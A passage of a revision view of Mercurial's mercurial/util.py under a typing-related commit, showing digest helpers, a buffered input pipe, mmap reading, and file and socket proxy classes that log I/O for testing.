typing: make minor adjustments to mercurial/util.py to pass pytype checking...
Matt Harbison
r47663:51841b23 default
@@ -1,3732 +1,3735 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import collections
20 20 import contextlib
21 21 import errno
22 22 import gc
23 23 import hashlib
24 24 import itertools
25 25 import locale
26 26 import mmap
27 27 import os
28 28 import platform as pyplatform
29 29 import re as remod
30 30 import shutil
31 31 import socket
32 32 import stat
33 33 import sys
34 34 import time
35 35 import traceback
36 36 import warnings
37 37
38 38 from .thirdparty import attr
39 39 from .pycompat import (
40 40 delattr,
41 41 getattr,
42 42 open,
43 43 setattr,
44 44 )
45 45 from .node import hex
46 46 from hgdemandimport import tracing
47 47 from . import (
48 48 encoding,
49 49 error,
50 50 i18n,
51 51 policy,
52 52 pycompat,
53 53 urllibcompat,
54 54 )
55 55 from .utils import (
56 56 compression,
57 57 hashutil,
58 58 procutil,
59 59 stringutil,
60 60 )
61 61
62 62 if pycompat.TYPE_CHECKING:
63 63 from typing import (
64 64 Iterator,
65 65 List,
66 66 Optional,
67 67 Tuple,
68 68 Union,
69 69 )
70 70
71 71
72 72 base85 = policy.importmod('base85')
73 73 osutil = policy.importmod('osutil')
74 74
75 75 b85decode = base85.b85decode
76 76 b85encode = base85.b85encode
77 77
78 78 cookielib = pycompat.cookielib
79 79 httplib = pycompat.httplib
80 80 pickle = pycompat.pickle
81 81 safehasattr = pycompat.safehasattr
82 82 socketserver = pycompat.socketserver
83 83 bytesio = pycompat.bytesio
84 84 # TODO deprecate stringio name, as it is a lie on Python 3.
85 85 stringio = bytesio
86 86 xmlrpclib = pycompat.xmlrpclib
87 87
88 88 httpserver = urllibcompat.httpserver
89 89 urlerr = urllibcompat.urlerr
90 90 urlreq = urllibcompat.urlreq
91 91
92 92 # workaround for win32mbcs
93 93 _filenamebytestr = pycompat.bytestr
94 94
95 95 if pycompat.iswindows:
96 96 from . import windows as platform
97 97 else:
98 98 from . import posix as platform
99 99
100 100 _ = i18n._
101 101
102 102 bindunixsocket = platform.bindunixsocket
103 103 cachestat = platform.cachestat
104 104 checkexec = platform.checkexec
105 105 checklink = platform.checklink
106 106 copymode = platform.copymode
107 107 expandglobs = platform.expandglobs
108 108 getfsmountpoint = platform.getfsmountpoint
109 109 getfstype = platform.getfstype
110 110 groupmembers = platform.groupmembers
111 111 groupname = platform.groupname
112 112 isexec = platform.isexec
113 113 isowner = platform.isowner
114 114 listdir = osutil.listdir
115 115 localpath = platform.localpath
116 116 lookupreg = platform.lookupreg
117 117 makedir = platform.makedir
118 118 nlinks = platform.nlinks
119 119 normpath = platform.normpath
120 120 normcase = platform.normcase
121 121 normcasespec = platform.normcasespec
122 122 normcasefallback = platform.normcasefallback
123 123 openhardlinks = platform.openhardlinks
124 124 oslink = platform.oslink
125 125 parsepatchoutput = platform.parsepatchoutput
126 126 pconvert = platform.pconvert
127 127 poll = platform.poll
128 128 posixfile = platform.posixfile
129 129 readlink = platform.readlink
130 130 rename = platform.rename
131 131 removedirs = platform.removedirs
132 132 samedevice = platform.samedevice
133 133 samefile = platform.samefile
134 134 samestat = platform.samestat
135 135 setflags = platform.setflags
136 136 split = platform.split
137 137 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
138 138 statisexec = platform.statisexec
139 139 statislink = platform.statislink
140 140 umask = platform.umask
141 141 unlink = platform.unlink
142 142 username = platform.username
143 143
144 144
145 145 def setumask(val):
146 146 # type: (int) -> None
147 147 ''' updates the umask. used by chg server '''
148 148 if pycompat.iswindows:
149 149 return
150 150 os.umask(val)
151 151 global umask
152 152 platform.umask = umask = val & 0o777
153 153
154 154
155 155 # small compat layer
156 156 compengines = compression.compengines
157 157 SERVERROLE = compression.SERVERROLE
158 158 CLIENTROLE = compression.CLIENTROLE
159 159
160 160 try:
161 161 recvfds = osutil.recvfds
162 162 except AttributeError:
163 163 pass
164 164
165 165 # Python compatibility
166 166
167 167 _notset = object()
168 168
169 169
170 170 def bitsfrom(container):
171 171 bits = 0
172 172 for bit in container:
173 173 bits |= bit
174 174 return bits
175 175
176 176
177 177 # Python 2.6 still has deprecation warnings enabled by default. We do not want
178 178 # to display anything to the standard user, so detect if we are running tests
179 179 # and only use Python deprecation warnings in this case.
180 180 _dowarn = bool(encoding.environ.get(b'HGEMITWARNINGS'))
181 181 if _dowarn:
182 182 # explicitly unfilter our warning for python 2.7
183 183 #
184 184 # The option of setting PYTHONWARNINGS in the test runner was investigated.
185 185 # However, a module name set through PYTHONWARNINGS is matched exactly, so
186 186 # we cannot set 'mercurial' and have it match e.g. 'mercurial.scmutil'. This
187 187 # makes the whole PYTHONWARNINGS approach useless for our use case.
188 188 warnings.filterwarnings('default', '', DeprecationWarning, 'mercurial')
189 189 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext')
190 190 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext3rd')
191 191 if _dowarn and pycompat.ispy3:
192 192 # silence warning emitted by passing user string to re.sub()
193 193 warnings.filterwarnings(
194 194 'ignore', 'bad escape', DeprecationWarning, 'mercurial'
195 195 )
196 196 warnings.filterwarnings(
197 197 'ignore', 'invalid escape sequence', DeprecationWarning, 'mercurial'
198 198 )
199 199 # TODO: reinvent imp.is_frozen()
200 200 warnings.filterwarnings(
201 201 'ignore',
202 202 'the imp module is deprecated',
203 203 DeprecationWarning,
204 204 'mercurial',
205 205 )
206 206
207 207
208 208 def nouideprecwarn(msg, version, stacklevel=1):
209 209 """Issue a Python native deprecation warning
210 210
211 211 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
212 212 """
213 213 if _dowarn:
214 214 msg += (
215 215 b"\n(compatibility will be dropped after Mercurial-%s,"
216 216 b" update your code.)"
217 217 ) % version
218 218 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
219 219 # on python 3 with chg, we will need to explicitly flush the output
220 220 sys.stderr.flush()
221 221
222 222
223 223 DIGESTS = {
224 224 b'md5': hashlib.md5,
225 225 b'sha1': hashutil.sha1,
226 226 b'sha512': hashlib.sha512,
227 227 }
228 228 # List of digest types from strongest to weakest
229 229 DIGESTS_BY_STRENGTH = [b'sha512', b'sha1', b'md5']
230 230
231 231 for k in DIGESTS_BY_STRENGTH:
232 232 assert k in DIGESTS
233 233
234 234
235 235 class digester(object):
236 236 """helper to compute digests.
237 237
238 238 This helper can be used to compute one or more digests given their name.
239 239
240 240 >>> d = digester([b'md5', b'sha1'])
241 241 >>> d.update(b'foo')
242 242 >>> [k for k in sorted(d)]
243 243 ['md5', 'sha1']
244 244 >>> d[b'md5']
245 245 'acbd18db4cc2f85cedef654fccc4a4d8'
246 246 >>> d[b'sha1']
247 247 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
248 248 >>> digester.preferred([b'md5', b'sha1'])
249 249 'sha1'
250 250 """
251 251
252 252 def __init__(self, digests, s=b''):
253 253 self._hashes = {}
254 254 for k in digests:
255 255 if k not in DIGESTS:
256 256 raise error.Abort(_(b'unknown digest type: %s') % k)
257 257 self._hashes[k] = DIGESTS[k]()
258 258 if s:
259 259 self.update(s)
260 260
261 261 def update(self, data):
262 262 for h in self._hashes.values():
263 263 h.update(data)
264 264
265 265 def __getitem__(self, key):
266 266 if key not in DIGESTS:
267 267 raise error.Abort(_(b'unknown digest type: %s') % key)
268 268 return hex(self._hashes[key].digest())
269 269
270 270 def __iter__(self):
271 271 return iter(self._hashes)
272 272
273 273 @staticmethod
274 274 def preferred(supported):
275 275 """returns the strongest digest type in both supported and DIGESTS."""
276 276
277 277 for k in DIGESTS_BY_STRENGTH:
278 278 if k in supported:
279 279 return k
280 280 return None
281 281
282 282
283 283 class digestchecker(object):
284 284 """file handle wrapper that additionally checks content against a given
285 285 size and digests.
286 286
287 287 d = digestchecker(fh, size, {'md5': '...'})
288 288
289 289 When multiple digests are given, all of them are validated.
290 290 """
291 291
292 292 def __init__(self, fh, size, digests):
293 293 self._fh = fh
294 294 self._size = size
295 295 self._got = 0
296 296 self._digests = dict(digests)
297 297 self._digester = digester(self._digests.keys())
298 298
299 299 def read(self, length=-1):
300 300 content = self._fh.read(length)
301 301 self._digester.update(content)
302 302 self._got += len(content)
303 303 return content
304 304
305 305 def validate(self):
306 306 if self._size != self._got:
307 307 raise error.Abort(
308 308 _(b'size mismatch: expected %d, got %d')
309 309 % (self._size, self._got)
310 310 )
311 311 for k, v in self._digests.items():
312 312 if v != self._digester[k]:
313 313 # i18n: first parameter is a digest name
314 314 raise error.Abort(
315 315 _(b'%s mismatch: expected %s, got %s')
316 316 % (k, v, self._digester[k])
317 317 )
318 318
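A minimal usage sketch (illustrative only, not part of the module; it reuses the sha1 of b'foo' from the digester doctest above and assumes ``io`` is imported):

    import io
    fh = digestchecker(
        io.BytesIO(b'foo'),
        3,
        {b'sha1': b'0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'},
    )
    fh.read()
    fh.validate()   # passes; raises error.Abort on size/digest mismatch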
319 319
320 320 try:
321 321 buffer = buffer # pytype: disable=name-error
322 322 except NameError:
323 323
324 324 def buffer(sliceable, offset=0, length=None):
325 325 if length is not None:
326 326 return memoryview(sliceable)[offset : offset + length]
327 327 return memoryview(sliceable)[offset:]
328 328
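On Python 3 the ``buffer`` builtin is gone, so the memoryview shim above is what runs; a small sketch of its zero-copy slicing:

    view = buffer(b'abcdef', 2, 3)              # window onto the bytes, no copy
    assert bytes(view) == b'cde'
    assert bytes(buffer(b'abcdef', 4)) == b'ef'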
329 329
330 330 _chunksize = 4096
331 331
332 332
333 333 class bufferedinputpipe(object):
334 334 """a manually buffered input pipe
335 335
336 336 Python will not let us use buffered IO and lazy reading with 'polling' at
337 337 the same time. We cannot probe the buffer state and select will not detect
338 338 that data are ready to read if they are already buffered.
339 339
340 340 This class lets us work around that by implementing its own buffering
341 341 (allowing efficient readline) while offering a way to know if the buffer is
342 342 empty from the output (allowing collaboration of the buffer with polling).
343 343
344 344 This class lives in the 'util' module because it makes use of the 'os'
345 345 module from the python stdlib.
346 346 """
347 347
348 348 def __new__(cls, fh):
349 349 # If we receive a fileobjectproxy, we need to use a variation of this
350 350 # class that notifies observers about activity.
351 351 if isinstance(fh, fileobjectproxy):
352 352 cls = observedbufferedinputpipe
353 353
354 354 return super(bufferedinputpipe, cls).__new__(cls)
355 355
356 356 def __init__(self, input):
357 357 self._input = input
358 358 self._buffer = []
359 359 self._eof = False
360 360 self._lenbuf = 0
361 361
362 362 @property
363 363 def hasbuffer(self):
364 364 """True if any data is currently buffered
365 365
366 366 This will be used externally as a pre-step for polling IO. If there is
367 367 already data then no polling should be set up."""
368 368 return bool(self._buffer)
369 369
370 370 @property
371 371 def closed(self):
372 372 return self._input.closed
373 373
374 374 def fileno(self):
375 375 return self._input.fileno()
376 376
377 377 def close(self):
378 378 return self._input.close()
379 379
380 380 def read(self, size):
381 381 while (not self._eof) and (self._lenbuf < size):
382 382 self._fillbuffer()
383 383 return self._frombuffer(size)
384 384
385 385 def unbufferedread(self, size):
386 386 if not self._eof and self._lenbuf == 0:
387 387 self._fillbuffer(max(size, _chunksize))
388 388 return self._frombuffer(min(self._lenbuf, size))
389 389
390 390 def readline(self, *args, **kwargs):
391 391 if len(self._buffer) > 1:
392 392 # this should not happen because both read and readline end with a
393 393 # _frombuffer call that collapses it.
394 394 self._buffer = [b''.join(self._buffer)]
395 395 self._lenbuf = len(self._buffer[0])
396 396 lfi = -1
397 397 if self._buffer:
398 398 lfi = self._buffer[-1].find(b'\n')
399 399 while (not self._eof) and lfi < 0:
400 400 self._fillbuffer()
401 401 if self._buffer:
402 402 lfi = self._buffer[-1].find(b'\n')
403 403 size = lfi + 1
404 404 if lfi < 0: # end of file
405 405 size = self._lenbuf
406 406 elif len(self._buffer) > 1:
407 407 # we need to take previous chunks into account
408 408 size += self._lenbuf - len(self._buffer[-1])
409 409 return self._frombuffer(size)
410 410
411 411 def _frombuffer(self, size):
412 412 """return at most 'size' data from the buffer
413 413
414 414 The data are removed from the buffer."""
415 415 if size == 0 or not self._buffer:
416 416 return b''
417 417 buf = self._buffer[0]
418 418 if len(self._buffer) > 1:
419 419 buf = b''.join(self._buffer)
420 420
421 421 data = buf[:size]
422 422 buf = buf[len(data) :]
423 423 if buf:
424 424 self._buffer = [buf]
425 425 self._lenbuf = len(buf)
426 426 else:
427 427 self._buffer = []
428 428 self._lenbuf = 0
429 429 return data
430 430
431 431 def _fillbuffer(self, size=_chunksize):
432 432 """read data to the buffer"""
433 433 data = os.read(self._input.fileno(), size)
434 434 if not data:
435 435 self._eof = True
436 436 else:
437 437 self._lenbuf += len(data)
438 438 self._buffer.append(data)
439 439
440 440 return data
441 441
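A short sketch of the pipe in use (hypothetical data; assumes both lines are already written and therefore arrive in a single os.read()):

    r, w = os.pipe()
    os.write(w, b'one\ntwo\n')
    pipe = bufferedinputpipe(os.fdopen(r, 'rb'))
    assert pipe.readline() == b'one\n'
    assert pipe.hasbuffer               # b'two\n' is still buffered, so no
                                        # polling needs to be set up yet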
442 442
443 443 def mmapread(fp, size=None):
444 444 if size == 0:
445 445 # size of 0 to mmap.mmap() means "all data"
446 446 # rather than "zero bytes", so special case that.
447 447 return b''
448 448 elif size is None:
449 449 size = 0
450 450 try:
451 451 fd = getattr(fp, 'fileno', lambda: fp)()
452 452 return mmap.mmap(fd, size, access=mmap.ACCESS_READ)
453 453 except ValueError:
454 454 # Empty files cannot be mmapped, but mmapread should still work. Check
455 455 # if the file is empty, and if so, return an empty buffer.
456 456 if os.fstat(fd).st_size == 0:
457 457 return b''
458 458 raise
459 459
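A hedged usage sketch (the path is hypothetical):

    with open('some-file.bin', 'rb') as fp:
        data = mmapread(fp)        # an mmap object, or b'' if the file is empty
        header = bytes(data[:4])   # slicing copies only the requested bytes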
460 460
461 461 class fileobjectproxy(object):
462 462 """A proxy around file objects that tells a watcher when events occur.
463 463
464 464 This type is intended to only be used for testing purposes. Think hard
465 465 before using it in important code.
466 466 """
467 467
468 468 __slots__ = (
469 469 '_orig',
470 470 '_observer',
471 471 )
472 472
473 473 def __init__(self, fh, observer):
474 474 object.__setattr__(self, '_orig', fh)
475 475 object.__setattr__(self, '_observer', observer)
476 476
477 477 def __getattribute__(self, name):
478 478 ours = {
479 479 '_observer',
480 480 # IOBase
481 481 'close',
482 482 # closed is a property
483 483 'fileno',
484 484 'flush',
485 485 'isatty',
486 486 'readable',
487 487 'readline',
488 488 'readlines',
489 489 'seek',
490 490 'seekable',
491 491 'tell',
492 492 'truncate',
493 493 'writable',
494 494 'writelines',
495 495 # RawIOBase
496 496 'read',
497 497 'readall',
498 498 'readinto',
499 499 'write',
500 500 # BufferedIOBase
501 501 # raw is a property
502 502 'detach',
503 503 # read defined above
504 504 'read1',
505 505 # readinto defined above
506 506 # write defined above
507 507 }
508 508
509 509 # We only observe some methods.
510 510 if name in ours:
511 511 return object.__getattribute__(self, name)
512 512
513 513 return getattr(object.__getattribute__(self, '_orig'), name)
514 514
515 515 def __nonzero__(self):
516 516 return bool(object.__getattribute__(self, '_orig'))
517 517
518 518 __bool__ = __nonzero__
519 519
520 520 def __delattr__(self, name):
521 521 return delattr(object.__getattribute__(self, '_orig'), name)
522 522
523 523 def __setattr__(self, name, value):
524 524 return setattr(object.__getattribute__(self, '_orig'), name, value)
525 525
526 526 def __iter__(self):
527 527 return object.__getattribute__(self, '_orig').__iter__()
528 528
529 529 def _observedcall(self, name, *args, **kwargs):
530 530 # Call the original object.
531 531 orig = object.__getattribute__(self, '_orig')
532 532 res = getattr(orig, name)(*args, **kwargs)
533 533
534 534 # Call a method on the observer of the same name with arguments
535 535 # so it can react, log, etc.
536 536 observer = object.__getattribute__(self, '_observer')
537 537 fn = getattr(observer, name, None)
538 538 if fn:
539 539 fn(res, *args, **kwargs)
540 540
541 541 return res
542 542
543 543 def close(self, *args, **kwargs):
544 544 return object.__getattribute__(self, '_observedcall')(
545 545 'close', *args, **kwargs
546 546 )
547 547
548 548 def fileno(self, *args, **kwargs):
549 549 return object.__getattribute__(self, '_observedcall')(
550 550 'fileno', *args, **kwargs
551 551 )
552 552
553 553 def flush(self, *args, **kwargs):
554 554 return object.__getattribute__(self, '_observedcall')(
555 555 'flush', *args, **kwargs
556 556 )
557 557
558 558 def isatty(self, *args, **kwargs):
559 559 return object.__getattribute__(self, '_observedcall')(
560 560 'isatty', *args, **kwargs
561 561 )
562 562
563 563 def readable(self, *args, **kwargs):
564 564 return object.__getattribute__(self, '_observedcall')(
565 565 'readable', *args, **kwargs
566 566 )
567 567
568 568 def readline(self, *args, **kwargs):
569 569 return object.__getattribute__(self, '_observedcall')(
570 570 'readline', *args, **kwargs
571 571 )
572 572
573 573 def readlines(self, *args, **kwargs):
574 574 return object.__getattribute__(self, '_observedcall')(
575 575 'readlines', *args, **kwargs
576 576 )
577 577
578 578 def seek(self, *args, **kwargs):
579 579 return object.__getattribute__(self, '_observedcall')(
580 580 'seek', *args, **kwargs
581 581 )
582 582
583 583 def seekable(self, *args, **kwargs):
584 584 return object.__getattribute__(self, '_observedcall')(
585 585 'seekable', *args, **kwargs
586 586 )
587 587
588 588 def tell(self, *args, **kwargs):
589 589 return object.__getattribute__(self, '_observedcall')(
590 590 'tell', *args, **kwargs
591 591 )
592 592
593 593 def truncate(self, *args, **kwargs):
594 594 return object.__getattribute__(self, '_observedcall')(
595 595 'truncate', *args, **kwargs
596 596 )
597 597
598 598 def writable(self, *args, **kwargs):
599 599 return object.__getattribute__(self, '_observedcall')(
600 600 'writable', *args, **kwargs
601 601 )
602 602
603 603 def writelines(self, *args, **kwargs):
604 604 return object.__getattribute__(self, '_observedcall')(
605 605 'writelines', *args, **kwargs
606 606 )
607 607
608 608 def read(self, *args, **kwargs):
609 609 return object.__getattribute__(self, '_observedcall')(
610 610 'read', *args, **kwargs
611 611 )
612 612
613 613 def readall(self, *args, **kwargs):
614 614 return object.__getattribute__(self, '_observedcall')(
615 615 'readall', *args, **kwargs
616 616 )
617 617
618 618 def readinto(self, *args, **kwargs):
619 619 return object.__getattribute__(self, '_observedcall')(
620 620 'readinto', *args, **kwargs
621 621 )
622 622
623 623 def write(self, *args, **kwargs):
624 624 return object.__getattribute__(self, '_observedcall')(
625 625 'write', *args, **kwargs
626 626 )
627 627
628 628 def detach(self, *args, **kwargs):
629 629 return object.__getattribute__(self, '_observedcall')(
630 630 'detach', *args, **kwargs
631 631 )
632 632
633 633 def read1(self, *args, **kwargs):
634 634 return object.__getattribute__(self, '_observedcall')(
635 635 'read1', *args, **kwargs
636 636 )
637 637
638 638
639 639 class observedbufferedinputpipe(bufferedinputpipe):
640 640 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
641 641
642 642 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
643 643 bypass ``fileobjectproxy``. Because of this, we need to make
644 644 ``bufferedinputpipe`` aware of these operations.
645 645
646 646 This variation of ``bufferedinputpipe`` can notify observers about
647 647 ``os.read()`` events. It also re-publishes other events, such as
648 648 ``read()`` and ``readline()``.
649 649 """
650 650
651 651 def _fillbuffer(self):
652 652 res = super(observedbufferedinputpipe, self)._fillbuffer()
653 653
654 654 fn = getattr(self._input._observer, 'osread', None)
655 655 if fn:
656 656 fn(res, _chunksize)
657 657
658 658 return res
659 659
660 660 # We use different observer methods because the operation isn't
661 661 # performed on the actual file object but on us.
662 662 def read(self, size):
663 663 res = super(observedbufferedinputpipe, self).read(size)
664 664
665 665 fn = getattr(self._input._observer, 'bufferedread', None)
666 666 if fn:
667 667 fn(res, size)
668 668
669 669 return res
670 670
671 671 def readline(self, *args, **kwargs):
672 672 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
673 673
674 674 fn = getattr(self._input._observer, 'bufferedreadline', None)
675 675 if fn:
676 676 fn(res)
677 677
678 678 return res
679 679
680 680
681 681 PROXIED_SOCKET_METHODS = {
682 682 'makefile',
683 683 'recv',
684 684 'recvfrom',
685 685 'recvfrom_into',
686 686 'recv_into',
687 687 'send',
688 688 'sendall',
689 689 'sendto',
690 690 'setblocking',
691 691 'settimeout',
692 692 'gettimeout',
693 693 'setsockopt',
694 694 }
695 695
696 696
697 697 class socketproxy(object):
698 698 """A proxy around a socket that tells a watcher when events occur.
699 699
700 700 This is like ``fileobjectproxy`` except for sockets.
701 701
702 702 This type is intended to only be used for testing purposes. Think hard
703 703 before using it in important code.
704 704 """
705 705
706 706 __slots__ = (
707 707 '_orig',
708 708 '_observer',
709 709 )
710 710
711 711 def __init__(self, sock, observer):
712 712 object.__setattr__(self, '_orig', sock)
713 713 object.__setattr__(self, '_observer', observer)
714 714
715 715 def __getattribute__(self, name):
716 716 if name in PROXIED_SOCKET_METHODS:
717 717 return object.__getattribute__(self, name)
718 718
719 719 return getattr(object.__getattribute__(self, '_orig'), name)
720 720
721 721 def __delattr__(self, name):
722 722 return delattr(object.__getattribute__(self, '_orig'), name)
723 723
724 724 def __setattr__(self, name, value):
725 725 return setattr(object.__getattribute__(self, '_orig'), name, value)
726 726
727 727 def __nonzero__(self):
728 728 return bool(object.__getattribute__(self, '_orig'))
729 729
730 730 __bool__ = __nonzero__
731 731
732 732 def _observedcall(self, name, *args, **kwargs):
733 733 # Call the original object.
734 734 orig = object.__getattribute__(self, '_orig')
735 735 res = getattr(orig, name)(*args, **kwargs)
736 736
737 737 # Call a method on the observer of the same name with arguments
738 738 # so it can react, log, etc.
739 739 observer = object.__getattribute__(self, '_observer')
740 740 fn = getattr(observer, name, None)
741 741 if fn:
742 742 fn(res, *args, **kwargs)
743 743
744 744 return res
745 745
746 746 def makefile(self, *args, **kwargs):
747 747 res = object.__getattribute__(self, '_observedcall')(
748 748 'makefile', *args, **kwargs
749 749 )
750 750
751 751 # The file object may be used for I/O. So we turn it into a
752 752 # proxy using our observer.
753 753 observer = object.__getattribute__(self, '_observer')
754 754 return makeloggingfileobject(
755 755 observer.fh,
756 756 res,
757 757 observer.name,
758 758 reads=observer.reads,
759 759 writes=observer.writes,
760 760 logdata=observer.logdata,
761 761 logdataapis=observer.logdataapis,
762 762 )
763 763
764 764 def recv(self, *args, **kwargs):
765 765 return object.__getattribute__(self, '_observedcall')(
766 766 'recv', *args, **kwargs
767 767 )
768 768
769 769 def recvfrom(self, *args, **kwargs):
770 770 return object.__getattribute__(self, '_observedcall')(
771 771 'recvfrom', *args, **kwargs
772 772 )
773 773
774 774 def recvfrom_into(self, *args, **kwargs):
775 775 return object.__getattribute__(self, '_observedcall')(
776 776 'recvfrom_into', *args, **kwargs
777 777 )
778 778
779 779 def recv_into(self, *args, **kwargs):
780 780 return object.__getattribute__(self, '_observedcall')(
781 781 'recv_into', *args, **kwargs
782 782 )
783 783
784 784 def send(self, *args, **kwargs):
785 785 return object.__getattribute__(self, '_observedcall')(
786 786 'send', *args, **kwargs
787 787 )
788 788
789 789 def sendall(self, *args, **kwargs):
790 790 return object.__getattribute__(self, '_observedcall')(
791 791 'sendall', *args, **kwargs
792 792 )
793 793
794 794 def sendto(self, *args, **kwargs):
795 795 return object.__getattribute__(self, '_observedcall')(
796 796 'sendto', *args, **kwargs
797 797 )
798 798
799 799 def setblocking(self, *args, **kwargs):
800 800 return object.__getattribute__(self, '_observedcall')(
801 801 'setblocking', *args, **kwargs
802 802 )
803 803
804 804 def settimeout(self, *args, **kwargs):
805 805 return object.__getattribute__(self, '_observedcall')(
806 806 'settimeout', *args, **kwargs
807 807 )
808 808
809 809 def gettimeout(self, *args, **kwargs):
810 810 return object.__getattribute__(self, '_observedcall')(
811 811 'gettimeout', *args, **kwargs
812 812 )
813 813
814 814 def setsockopt(self, *args, **kwargs):
815 815 return object.__getattribute__(self, '_observedcall')(
816 816 'setsockopt', *args, **kwargs
817 817 )
818 818
819 819
820 820 class baseproxyobserver(object):
821 821 def __init__(self, fh, name, logdata, logdataapis):
822 822 self.fh = fh
823 823 self.name = name
824 824 self.logdata = logdata
825 825 self.logdataapis = logdataapis
826 826
827 827 def _writedata(self, data):
828 828 if not self.logdata:
829 829 if self.logdataapis:
830 830 self.fh.write(b'\n')
831 831 self.fh.flush()
832 832 return
833 833
834 834 # Simple case writes all data on a single line.
835 835 if b'\n' not in data:
836 836 if self.logdataapis:
837 837 self.fh.write(b': %s\n' % stringutil.escapestr(data))
838 838 else:
839 839 self.fh.write(
840 840 b'%s> %s\n' % (self.name, stringutil.escapestr(data))
841 841 )
842 842 self.fh.flush()
843 843 return
844 844
845 845 # Data with newlines is written to multiple lines.
846 846 if self.logdataapis:
847 847 self.fh.write(b':\n')
848 848
849 849 lines = data.splitlines(True)
850 850 for line in lines:
851 851 self.fh.write(
852 852 b'%s> %s\n' % (self.name, stringutil.escapestr(line))
853 853 )
854 854 self.fh.flush()
855 855
856 856
857 857 class fileobjectobserver(baseproxyobserver):
858 858 """Logs file object activity."""
859 859
860 860 def __init__(
861 861 self, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
862 862 ):
863 863 super(fileobjectobserver, self).__init__(fh, name, logdata, logdataapis)
864 864 self.reads = reads
865 865 self.writes = writes
866 866
867 867 def read(self, res, size=-1):
868 868 if not self.reads:
869 869 return
870 870 # Python 3 can return None from reads at EOF instead of empty strings.
871 871 if res is None:
872 872 res = b''
873 873
874 874 if size == -1 and res == b'':
875 875 # Suppress pointless read(-1) calls that return
876 876 # nothing. These happen _a lot_ on Python 3, and there
877 877 # doesn't seem to be a better workaround to have matching
878 878 # Python 2 and 3 behavior. :(
879 879 return
880 880
881 881 if self.logdataapis:
882 882 self.fh.write(b'%s> read(%d) -> %d' % (self.name, size, len(res)))
883 883
884 884 self._writedata(res)
885 885
886 886 def readline(self, res, limit=-1):
887 887 if not self.reads:
888 888 return
889 889
890 890 if self.logdataapis:
891 891 self.fh.write(b'%s> readline() -> %d' % (self.name, len(res)))
892 892
893 893 self._writedata(res)
894 894
895 895 def readinto(self, res, dest):
896 896 if not self.reads:
897 897 return
898 898
899 899 if self.logdataapis:
900 900 self.fh.write(
901 901 b'%s> readinto(%d) -> %r' % (self.name, len(dest), res)
902 902 )
903 903
904 904 data = dest[0:res] if res is not None else b''
905 905
906 906 # _writedata() uses "in" operator and is confused by memoryview because
907 907 # characters are ints on Python 3.
908 908 if isinstance(data, memoryview):
909 909 data = data.tobytes()
910 910
911 911 self._writedata(data)
912 912
913 913 def write(self, res, data):
914 914 if not self.writes:
915 915 return
916 916
917 917 # Python 2 returns None from some write() calls. Python 3 (reasonably)
918 918 # returns the integer bytes written.
919 919 if res is None and data:
920 920 res = len(data)
921 921
922 922 if self.logdataapis:
923 923 self.fh.write(b'%s> write(%d) -> %r' % (self.name, len(data), res))
924 924
925 925 self._writedata(data)
926 926
927 927 def flush(self, res):
928 928 if not self.writes:
929 929 return
930 930
931 931 self.fh.write(b'%s> flush() -> %r\n' % (self.name, res))
932 932
933 933 # For observedbufferedinputpipe.
934 934 def bufferedread(self, res, size):
935 935 if not self.reads:
936 936 return
937 937
938 938 if self.logdataapis:
939 939 self.fh.write(
940 940 b'%s> bufferedread(%d) -> %d' % (self.name, size, len(res))
941 941 )
942 942
943 943 self._writedata(res)
944 944
945 945 def bufferedreadline(self, res):
946 946 if not self.reads:
947 947 return
948 948
949 949 if self.logdataapis:
950 950 self.fh.write(
951 951 b'%s> bufferedreadline() -> %d' % (self.name, len(res))
952 952 )
953 953
954 954 self._writedata(res)
955 955
956 956
957 957 def makeloggingfileobject(
958 958 logh, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
959 959 ):
960 960 """Turn a file object into a logging file object."""
961 961
962 962 observer = fileobjectobserver(
963 963 logh,
964 964 name,
965 965 reads=reads,
966 966 writes=writes,
967 967 logdata=logdata,
968 968 logdataapis=logdataapis,
969 969 )
970 970 return fileobjectproxy(fh, observer)
971 971
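A sketch of the resulting proxy (all names local to the example; assumes ``io`` is imported):

    import io
    logfh = io.BytesIO()
    proxied = makeloggingfileobject(
        logfh, io.BytesIO(b'data'), b'src', logdata=True
    )
    proxied.read(4)
    # logfh now contains a line like: b'src> read(4) -> 4: data\n'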
972 972
973 973 class socketobserver(baseproxyobserver):
974 974 """Logs socket activity."""
975 975
976 976 def __init__(
977 977 self,
978 978 fh,
979 979 name,
980 980 reads=True,
981 981 writes=True,
982 982 states=True,
983 983 logdata=False,
984 984 logdataapis=True,
985 985 ):
986 986 super(socketobserver, self).__init__(fh, name, logdata, logdataapis)
987 987 self.reads = reads
988 988 self.writes = writes
989 989 self.states = states
990 990
991 991 def makefile(self, res, mode=None, bufsize=None):
992 992 if not self.states:
993 993 return
994 994
995 995 self.fh.write(b'%s> makefile(%r, %r)\n' % (self.name, mode, bufsize))
996 996
997 997 def recv(self, res, size, flags=0):
998 998 if not self.reads:
999 999 return
1000 1000
1001 1001 if self.logdataapis:
1002 1002 self.fh.write(
1003 1003 b'%s> recv(%d, %d) -> %d' % (self.name, size, flags, len(res))
1004 1004 )
1005 1005 self._writedata(res)
1006 1006
1007 1007 def recvfrom(self, res, size, flags=0):
1008 1008 if not self.reads:
1009 1009 return
1010 1010
1011 1011 if self.logdataapis:
1012 1012 self.fh.write(
1013 1013 b'%s> recvfrom(%d, %d) -> %d'
1014 1014 % (self.name, size, flags, len(res[0]))
1015 1015 )
1016 1016
